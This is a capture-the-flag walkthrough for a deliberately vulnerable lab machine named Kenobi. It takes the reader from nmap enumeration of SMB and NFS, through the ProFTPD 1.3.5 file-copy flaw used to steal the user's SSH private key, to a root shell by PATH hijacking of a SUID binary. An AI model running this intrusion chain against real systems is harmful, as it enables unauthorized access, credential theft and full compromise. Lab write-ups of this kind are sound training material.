Deploy the vulnerable machine
#Make sure you’re connected to our network and deploy the machine
answer: No answer needed
#Scan the machine with nmap, how many ports are open?
answer: 7
Kick off the room with nmap scanning.
$ nmap -sV -sC $TARGET
Enumerating Samba for shares
#Using the nmap command above, how many shares have been found?
answer: 3
The information given in the section told us to run:
$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $TARGET
#Once you’re connected, list the files on the share. What is the file can you see?
answer: log.txt
Once we got to know anonymous being shared. We can just login without any password via smbclient:
smbclient //$TARGET/anonymous
We can then download all the files locally without password by:
smbget -R smb://$TARGET/anonymous
#What port is FTP running on?
answer: 21
From the nmap result above, we know FTP port is 21.
#What mount can we see?
answer: /var
By reading the section, we have information on how to get the mounts info:
$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $TARGET
Gain initial access with ProFtpd
#What is the version?
answer: 1.3.5
By looking at the nmap result above, we have the version for FTP.
#How many exploits are there for the ProFTPd running?
answer: 3
By using searchsploit, we can see that version 1.3.5 has at least 3 exploits.
$ searchsploit 1.3.5 ftpd
#We know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user.
answer: No answer needed
From the log.txt file we downloaded, we actually saw that username kenobi has the SSH key generated.
#We knew that the /var directory was a mount we could see (task 2, question 4). So we’ve now moved Kenobi’s private key to the /var/tmp directory.
answer: No answer needed
#What is Kenobi’s user flag (/home/kenobi/user.txt)?
answer: [NO SPOILER]
In order to get the user flag, via SSH, there are a few steps need to take:
- do a netcat (nc) to the target machine
- copy the id_rsa to a mountable folder, i.e. /var/tmp
- mount the network folder locally & win
$ nc $TARGET 21
$ sudo mkdir /mnt/kenobiNFS
$ sudo mount $TAGRET:/var /mnt/kenobiNFS
If you hit issue like me above, you can try install the nfs-common that inlcudes the /sbin/mount.nfs helper program, and re-run the command above.
Then you can navigate to /mnt/kenobiNFS for id_rsa.
Copy it to our local folder then chmod the id_rsa to 600 so we can login to the SSH.
$ cp id_rsa ~/room/kenobi
$ cd ~/room/kenobi
$ chmod 600 id_rsa
$ ssh -i id_rsa kenobi@$TARGET
Privilege Escalation with Path Variable Manipulation
#What file looks particularly out of the ordinary?
answer: /usr/bin/menu
Follow the information in the section and run the find command to look for SUID files in the system.
$ find / -perm -u=s -type f 2>/dev/null
#Run the binary, how many options appear?
answer: 3
What is this menu file? Just run and check it out:
$ /usr/bin/menu
#We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, its using our path variable to find the “curl” binary.. Which is actually a version of /usr/sh, as well as this file being run as root it runs our shell as root!
answer: [NO SPOILER]
Let’s try out what it does for each options:
Option 1:
HTTP/1.1 200 OK
Date: Thu, 28 Jan 2021 15:53:24 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: “c8–591b6884b6ed2”
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html
Option 2:
4.8.0–58-generic
Option 3:
eth0 Link encap:Ethernet HWaddr 02:d9:45:27:ca:35
inet addr:10.10.73.220 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::d9:45ff:fe27:ca35/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:7323 errors:0 dropped:0 overruns:0 frame:0
TX packets:6695 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:585993 (585.9 KB) TX bytes:697831 (697.8 KB)lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:246 errors:0 dropped:0 overruns:0 frame:0
TX packets:246 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:18383 (18.3 KB) TX bytes:18383 (18.3 KB)
From the three options above, we can guess that this menu programe is running some curl, uname and ifconifg commands. So we will run strings on it and check how it calls those commands.
$ strings /usr/bin/menu
It’s running the curl, uname and ifconfig without the full path, i.e. /usr/bin/curl, /bin/uname, /sbin/ifconfig. As these file are running as the root user privileges, we can manipulate our path to gain a root shell.
Let’s append the /tmp folder to the our PATH:
$ export PATH=/tmp:$PATH
Now we can fake the uname command and set it to be executable:
$ cat /etc/shells
Check what shell I can use.
$ echo /bin/sh > /tmp/uname
Fake the uname programme.
$ chmod +x /tmp/uname
Make it executable.
$ /usr/bin/menu
Run the menu programmer and choose option 2 and got the root!
